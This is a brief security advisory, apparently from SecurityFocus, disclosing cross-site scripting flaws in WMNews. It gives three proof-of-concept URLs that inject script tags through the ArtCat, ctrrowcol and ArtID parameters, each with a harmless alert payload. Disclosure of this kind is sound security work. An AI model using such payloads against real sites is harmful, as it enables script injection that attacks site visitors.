WMNews Multiple Cross-Site Scripting Vulnerabilities

This issue can be exploited through a web client.

The following proof-of-concept URIs are available:
http://www.example.com/path/wmview.php?ArtCat="><script>alert(/R00T3RR0R/)</script>
http://www.example.com/path/footer.php?ctrrowcol="><script>alert(/R00T3RR0R/)</script>
http://www.example.com/path/wmcomments.php?act=vi&CmID=2&ArtID="><script>alert(/R00T3RR0R/)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus